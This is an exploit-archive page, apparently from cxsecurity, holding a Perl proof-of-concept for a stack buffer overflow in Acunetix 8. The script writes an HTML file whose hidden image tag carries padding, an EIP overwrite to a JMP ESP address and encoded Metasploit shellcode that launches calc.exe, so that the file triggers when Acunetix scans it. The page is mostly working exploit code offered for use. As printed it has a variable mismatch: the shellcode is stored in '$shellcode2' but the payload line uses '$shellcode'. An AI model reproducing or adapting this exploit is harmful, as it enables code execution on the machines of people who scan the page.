Acunetix 2014 0DAY Buffer overflow *youtube

2014.04.24
Credit: an7isec
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-119

Youtube: https://www.youtube.com/watch?v=ifv9fRzVEzw # Exploit Title: Acunetix Stack Based overflow # Date: 24/04/14 # Exploit Author: Danor Cohen (An7i) - http://an7isec.blogspot.co.il/2014/04/pown-noobs-acunetix-0day.html # Vendor Homepage: http://www.acunetix.com/ # Software Link: http://www.acunetix.com/vulnerability-scanner/download/ # Version: 8 build 20120704 # Tested on: XP # # http://www.reddit.com/r/netsec/comments/23tbn6/pwn_the_n00bs_acunetix_0day/ # #This exploit generates HTML file, if this HTML will be scanned with ACUNETIX, shell will be executed. my $file= "index.html"; my $HTMLHeader1 = "<html>\r\n"; my $HTMLHeader2 = "\r\n</html>"; my $IMGheader1 = "<img style=\"opacity:0.0;filter:alpha(opacity=0);\" src=http://"; my $IMGheader2 = "><br>\n"; my $DomainName1 = "XSS"; my $DomainName2 = "CSRF"; my $DomainName3 = "DeepScan"; my $DomainName4 = "NetworkScan"; my $DomainName5 = "DenialOfService"; my $GeneralDotPadding = "." x 190; my $ExploitDomain = "SQLInjection"; my $DotPadding = "." x (202-length($ExploitDomain)); my $Padding1 = "A"x66; my $Padding2 = "B"x4; my $FlowCorrector = "500f"; #0x66303035 : readable memory location for fixing the flow my $EIPOverWrite = "]Qy~"; #0x7e79515d (JMP ESP from SXS.DLL). # windows/exec - 461 bytes # http://www.metasploit.com # Encoder: x86/alpha_upper # VERBOSE=false, PrependMigrate=false, EXITFUNC=thread, # CMD=calc.exe my $shellcode2 = "\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a" . "\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48" . "\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51" . "\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43" . "\x4a\x4a\x49\x4b\x4c\x5a\x48\x4b\x39\x33\x30\x45\x50\x53" . "\x30\x33\x50\x4c\x49\x4a\x45\x46\x51\x48\x52\x52\x44\x4c" . "\x4b\x36\x32\x50\x30\x4c\x4b\x51\x42\x34\x4c\x4c\x4b\x51" . "\x42\x35\x44\x4c\x4b\x52\x52\x37\x58\x54\x4f\x48\x37\x51" . "\x5a\x57\x56\x50\x31\x4b\x4f\x46\x51\x4f\x30\x4e\x4c\x37" . "\x4c\x45\x31\x33\x4c\x45\x52\x36\x4c\x47\x50\x59\x51\x58" . "\x4f\x54\x4d\x53\x31\x49\x57\x4d\x32\x4c\x30\x50\x52\x46" . "\x37\x4c\x4b\x31\x42\x44\x50\x4c\x4b\x30\x42\x57\x4c\x45" . "\x51\x4e\x30\x4c\x4b\x57\x30\x34\x38\x4b\x35\x59\x50\x42" . "\x54\x31\x5a\x53\x31\x48\x50\x36\x30\x4c\x4b\x37\x38\x52" . "\x38\x4c\x4b\x46\x38\x51\x30\x43\x31\x49\x43\x4a\x43\x47" . "\x4c\x47\x39\x4c\x4b\x56\x54\x4c\x4b\x45\x51\x48\x56\x36" . "\x51\x4b\x4f\x56\x51\x39\x50\x4e\x4c\x39\x51\x38\x4f\x54" . "\x4d\x43\x31\x49\x57\x56\x58\x4b\x50\x43\x45\x4a\x54\x35" . "\x53\x53\x4d\x4b\x48\x57\x4b\x43\x4d\x57\x54\x34\x35\x5a" . "\x42\x31\x48\x4c\x4b\x56\x38\x37\x54\x33\x31\x48\x53\x32" . "\x46\x4c\x4b\x34\x4c\x50\x4b\x4c\x4b\x56\x38\x35\x4c\x43" . "\x31\x58\x53\x4c\x4b\x43\x34\x4c\x4b\x43\x31\x4e\x30\x4b" . "\x39\x51\x54\x31\x34\x56\x44\x51\x4b\x51\x4b\x43\x51\x36" . "\x39\x51\x4a\x30\x51\x4b\x4f\x4b\x50\x50\x58\x51\x4f\x30" . "\x5a\x4c\x4b\x54\x52\x4a\x4b\x4b\x36\x31\x4d\x33\x5a\x53" . "\x31\x4c\x4d\x4b\x35\x4f\x49\x55\x50\x35\x50\x35\x50\x46" . "\x30\x42\x48\x36\x51\x4c\x4b\x32\x4f\x4b\x37\x4b\x4f\x58" . "\x55\x4f\x4b\x4b\x50\x45\x4d\x36\x4a\x34\x4a\x43\x58\x4e" . "\x46\x4d\x45\x4f\x4d\x4d\x4d\x4b\x4f\x39\x45\x57\x4c\x43" . "\x36\x43\x4c\x44\x4a\x4d\x50\x4b\x4b\x4d\x30\x42\x55\x34" . "\x45\x4f\x4b\x30\x47\x54\x53\x34\x32\x42\x4f\x52\x4a\x33" . "\x30\x51\x43\x4b\x4f\x59\x45\x45\x33\x33\x51\x52\x4c\x35" . "\x33\x46\x4e\x35\x35\x53\x48\x52\x45\x45\x50\x41\x41"; my $FinalDomainName1 = $IMGheader1.$DomainName1.$GeneralDotPadding.$IMGheader2; my $FinalDomainName2 = $IMGheader1.$DomainName2.$GeneralDotPadding.$IMGheader2; my $FinalDomainName3 = $IMGheader1.$DomainName3.$GeneralDotPadding.$IMGheader2; my $FinalDomainName4 = $IMGheader1.$DomainName4.$GeneralDotPadding.$IMGheader2; my $FinalDomainName5 = $IMGheader1.$DomainName5.$GeneralDotPadding.$IMGheader2; my $FinalExploitDomain = $IMGheader1.$ExploitDomain.$DotPadding.$Padding1.$FlowCorrector.$Padding2.$EIPOverWrite.$shellcode.$IMGheader2; open($FILE,">$file"); print $FILE $HTMLHeader1.$FinalDomainName1.$FinalDomainName2.$FinalDomainName3.$FinalDomainName4.$FinalDomainName5.$FinalExploitDomain.$HTMLHeader2; close($FILE); print "Acunetix Killer File Created successfully\n";

References:

http://an7isec.blogspot.com/2014/04/pown-noobs-acunetix-0day.html
https://www.youtube.com/watch?v=ifv9fRzVEzw


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top